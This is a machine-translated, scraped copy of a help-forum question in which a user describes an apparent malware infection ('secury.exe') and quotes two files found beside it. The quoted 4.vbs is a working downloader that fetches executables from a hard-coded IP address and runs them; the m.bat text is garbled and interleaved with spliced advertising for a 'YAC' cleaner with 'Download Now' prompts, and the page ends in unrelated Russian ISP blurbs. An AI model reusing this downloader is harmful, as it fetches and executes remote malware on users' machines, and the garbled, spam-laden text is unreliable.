• Главная
 • Карта сайта
Не найдено

прозорци - Како трајно да го убиеш почетниот клиент на пареа - супер корисник

Имам следнава ситуација во мојот менаџер на задачи:

Имам следнава ситуација во мојот менаџер на задачи:

Не знам каков тип на апликација е, но дефинитивно не е Steam client bootstrapper затоа што не го инсталирав и не можам да ја деинсталирам.

Ако се обидам да дознаам каков вид на апликација е преку овој чекор:

Гледам нешто како ова:

Во MS Config utility јас не најдов ништо што изгледа како secury.exe.

Кога ја отворам локацијата на датотеката, гледам три датотеки:

m.bat, b.exe, 4.vbs.

Подолу оди содржината на m.bat:

Забелешка: Оваа страница е преведен од страна на машинско преведување на софтвер, кликнете овде за да добие англиска верзија. Download Now Забелешка: Ако не може да го реши проблемот со YAC вирусот отстранување алатка, ве молиме пребарување подолу условите од страна на Google. Заеднички Поврзани Барај Услови: taskkill / f / t / im secury.exe, Чекор 1: Инсталирајте Светската најбрзиот и најлесниот компјутер почисто YAC. Download Now Чекор 2: Еднаш ќе се инсталира, ја отвори програмата, се сврти кон "Чистење" функција, и потоа кликнете на копчето "Исвестување -download" f / t / im winlnlt.exe задача / f / t / im WindowsUpgrade.exe задача / f / t / Чекор 1: Инсталирајте Светската најбрзиот и најлесниот компјутер почисто YAC. Download Now Чекор 2: Еднаш ќе се инсталира, ја отвори програмата и кликнете на копчето "Испитувајте се сега" во Домот функција.YAC тогаш ќе почне да ги скенира сите малициозни програми или ѓубре фајлови скриени во вашиот компјутер. Чекор 1: Инсталирајте Светската најбрзиот и најлесниот компјутер почисто YAC. Download Now Чекор 2: Чекор 3: Совети: Како да се отстрани f / t / C: \ Windows \ Поставување \ TrustedInstaller.exe дел C: \ Programdata \ ProgramData \ MSASCui.exe del C: \ Pro gData \ SystemSettlngs.exe дел C: \ ProgramData \ SystemSetting.exe дел C: \ ProgramData \ Process.exe дел C: \ ProgramData \ winlnlt.exe дел C: \ ProgramData \ WindowsUpgrade.exe дел C: \ ProgramData \ msdc.exe Чекор 1: Прво на сите рестартирајте го вашиот систем во Safe Mode и за таа притиснете F8 копчето откако ќе почнете да почнете вашиот компјутер. Отстрани C: \ Programdata \ \ svchosts.exe дел C: \ ProgramData \ win1ogins.exe дел C: \ ProgramData \ shovsts.exe дел C: \ ProgramData \ fcty.exe дел C: \ ProgramData \ pool.exe дел C: \ ProgramData \ pool2.exe дел C: \ ProgramData \ pool3.exe

Следно оди 4.vbs:

Постави xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Постави sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ Programdata \ s2.exe", 2 Постави xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Постави sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 Отвори () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell") Изврши "C: \ ProgramData \ pool3.exe" CreateObject "WScript.Shell") Изврши "del C: \ ProgramData \ pool3.exe"

Што можам да направам за да го спречам secury.exe да ги злоупотребува компјутерските овластувања на мојот сервер?

PS Јас сум извршил Avast целосна проверка на мојот компјутер, но тоа не најде ништо лошо.

Exe да ги злоупотребува компјутерските овластувања на мојот сервер?
Новости
Провайдеры:
 • 08.09.2015

  Batyevka.NET предоставляет услуги доступа к сети Интернет на территории Соломенского района г. Киева.Наша миссия —... 
  Читать полностью

 • 08.09.2015
  IPNET

  Компания IPNET — это крупнейший оператор и технологический лидер на рынке телекоммуникаций Киева. Мы предоставляем... 
  Читать полностью

 • 08.09.2015
  Boryspil.Net

  Интернет-провайдер «Boryspil.net» начал свою работу в 2008 году и на данный момент является одним из крупнейших поставщиков... 
  Читать полностью

 • 08.09.2015
  4OKNET

  Наша компания работает в сфере телекоммуникационных услуг, а именно — предоставлении доступа в сеть интернет.Уже... 
  Читать полностью

 • 08.09.2015
  Телегруп

  ДП «Телегруп-Украина» – IT-компания с 15-летним опытом работы на рынке телекоммуникационных услуг, а также официальный... 
  Читать полностью

 • 08.09.2015
  Софтлинк

  Высокая скоростьМы являемся участником Украинского центра обмена трафиком (UA — IX) с включением 10 Гбит / сек... 
  Читать полностью